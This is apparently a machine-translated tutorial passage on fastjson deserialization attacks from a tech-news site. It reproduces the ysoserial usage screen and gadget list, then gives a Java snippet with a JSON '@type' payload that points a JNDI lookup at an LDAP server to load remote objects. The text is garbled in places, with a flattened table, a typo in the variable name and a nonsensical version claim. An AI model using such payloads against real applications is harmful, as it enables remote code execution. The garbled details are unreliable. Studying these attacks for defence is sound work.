
$java-jar ysoserial.jarY SO SERIAL?Usage: java-jar ysoserial.jar [payload]'[command] 'Available payload types: Payload Authors Dependencies-BeanShell1 @ pwntester @ cschneider4711 bsh:2.0b5 C3P0 @ mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11 Clojure @ JackOfMostTrades clojure:1.8.0 CommonsBeanutils1 @ frohoff commons-beanutils:1.9.2, commons-collections:3.1 Commons-logging:1.2 CommonsCollections1 @ frohoff commons-collections:3.1 CommonsCollections2 @ frohoff commons-collections4:4.0 CommonsCollections3 @ frohoff commons-collections:3.1 CommonsCollections4 @ frohoff commons-collections4:4.0 CommonsCollections5 @ matthias_kaiser @ jasinner commons-collections:3.1 CommonsCollections6 @ matthias_kaiser commons-collections:3.1 FileUpload1 @ mbechler commons-fileupload:1.3.1 Commons-io:2.4 Groovy1 @ frohoff groovy:2.3.9 Hibernate1 @ mbechler Hibernate2 @ mbechler JBossInterceptors1 @ matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final Slf4j-api:1.7.21 JRMPClient @ mbechler JRMPListener @ mbechler JSON1 @ mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE Commons-collections:3.1 JavassistWeld1 @ matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 Jdk7u21 @ frohoff Jython1 @ pwntester @ cschneider4711 jython-standalone:2.5.2 MozillaRhino1 @ matthias_kaiser js:1.7R2 Myfaces1 @ mbechler Myfaces2 @ mbechler ROME @ mbechler rome:1.0 Spring1 @ frohoff spring-core:4.1.4.RELEASE Spring-beans:4.1.4.RELEASE Spring2 @ mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 URLDNS @ gebl Wicket1 @ jacob-baines wicket-util:6.23.0 Slf4j-api:1.6.4Fastjson version difference = 1.2.25 = 1.2.48

For fastjson 1.2.48 and later, you need to explicitly call * * setAutoTypeSupport (true) * * to trigger the vulnerability:

ParserConfig.getGlobalInstance (). SetAutoTypeSupport (true); String jsonStr = "{\" @ type\ ":\" oracle.jdbc.connector.OracleManagedConnectionFactory\ ",\" xaDataSourceName\ ":\" ldap://127.0.0.1:1389/ExportObject\ "}"; JSONObject json = JSON.parseObject (jsonStr5). This is how to learn fastjson deserialization from scratch. If you happen to have similar doubts, please refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.